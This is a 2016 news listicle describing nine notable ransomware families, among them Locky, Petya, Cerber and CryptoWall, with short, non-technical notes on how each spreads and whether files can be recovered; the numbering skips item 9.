Worst 10 ransomware attacks 2016 – we name the Internet's nastiest extortion malware
Four years ago ransomware was a type of malware that had been kicking around for a decade to little effect. By 2016, suddenly, it is everywhere, supplanting all other forms of malware as the number one menace. Two things changed its status – the rise of Bitcoins (untraceable payment) and the example of FBI scareware which started to decline around 2012 but proved the principle that digital extortion can be profitable.
According to Symantec, 16 families were discovered in the decade to 2014, most spread on a very small scale such as Cryzip, the first small-scale ransomware to affect the UK. In 2015, by spectacular contrast, 27 families were recorded in that year alone. This year it is expected to hit up to 60.
Ransomware is difficult to stop even for Windows computers running antivirus although that is improving. The only defence is backup but even that can come under attack from ransomware if it is reachable from the infected PC. Longer term, ransomware will inevitably fade but extortion malware could move to the next tactic of threatening people with exposure for non-existent crimes such as downloading child abuse images. With more SMEs being affected than ever before, this threat has a way to run yet.
1. CryptoLocker – where ransomware took off
CryptoLocker is long gone (downed by Operation Tovar in 2014) but it deserves infamy because its heyday of 2013 proved to cybercriminals how successful ransomware could be. It was supplanted by the equally vicious CryptoWall, which remains a headache to this day on systems not running updated AV or endpoint security. A long way behind state of the art but it doesn’t need to be. Recovery? It’s dead, Jim
2. Locky – well engineered, ruthless, clever
The work of the criminals behind the Dridex botnet, Locky is as bad as ransomware can get. Locky’s creators seem to have thought of everything, not only encrypting a wide range of data files but even Bitcoin wallets and Windows Volume Snapshot Service (VSS) files in case users try and restore files using that. Reaches out to attached shares and even other PCs and servers. Uses strong encryption and has found several high-profile victims. Recovery? No.
3. Crysis - Locky copycat with big ambitions
First detected by ESET in early 2016, Crysis styles itself on Locky in that it encrypts shadow copies and every file it can find including in some cases system files. This rather odd behaviour means that the infected PC can become inoperable. Attempts to elevate its privileges to admin level by stealing available logins and even steals files, including user credentials. Targets VMware virtual machines. Recovery? ESET has a decryptor for early versions.
4. zCrypt – ransomware that behaves like a virus
zCrypt tries the unusual technique of spreading as a virus. This means that it doesn’t rely on malicious emails to find victims and can spread on USB sticks. Creates a custom autorun.inf that allows it to execute automatically when it is plugged into a second machine. Instead of automatically encrypting all the files it can find it simply detects important directories and encrypts files that are changed. Scrambles files first to make recovery impossible.
5. PowerWare – PowerShell hijacker
Discovered by security firm Carbon Black, this one is interesting because it is aimed at business using Microsoft Word and the PowerShell scripting interface. This malware’s innovation is that it after tempting the user to enable macros to view a booby-trapped Word attachment it runs without files, hooking PowerShell to download a malicious script. Writing no files makes it hard to detect its activity when it encrypts files. Recovery? Possible says Carbon Black
6. Petya – attack the PC too
Ransomware usually encrypts files but Petya’s target is the system itself. Its first act is to overwrite the Master Boot Record (MBR), causing a full blue screen of death crash. When the user reboots instead of Windows they see a skull and crossbones splash screen with a ransom demand. Effectively, they are holding hostage the files and the entire system by encrypting the Master File Table making the files inaccessible. Recovery? Possible
7. HydraCrypt – ransomware can be beaten
Offshoots of the CrypBoss ransomware, Hydracrypt is notable for being pushed by the highly-active Angler exploit kit that suddenly and mysteriously disappeared in June 2016, HydraCrypt is possibly famous for the battle between its creators and a researcher called Fabian Wosar. So far, Wosar is winning hands down, having released decryptors for successive versions of this family. Recovery? Yes.
8. Cerber – ransomware-as-a-service
Cerber is one of a new breed of what appear to be ransomware-as-a-service applications. Encrypts files, of course, but not in Russia or former Soviet republics which might be a clue to its Russian origins. Once infected, PCs throws up fake Windows system alert, instituting a reboot before starting it encryption routine. Rubbing it in, Cerber even institutes the PC to speak its ransom demand in case the victim doesn’t notice the dropped text files. Recovery? None known
10. CryptoWall – it’s everywhere
With Locky and Cerber, CryptoWall is still the most common ransomware threat. Produced in several versions since at least 2014, version 4.0 has been distributed since late 2015 using the Angler exploit kit, CryptoWall feels like a mature piece of malware right down to its attempts at persistence and process injection. Little things stand out such as the way it makes every encrypted filename unique to make it more difficult to understand the damage. Recovery? No.
Cisco found that the latest version of the malware terminates itself if it runs in a virtual machine
Ransomware criminals persist because they know backup's dirty secret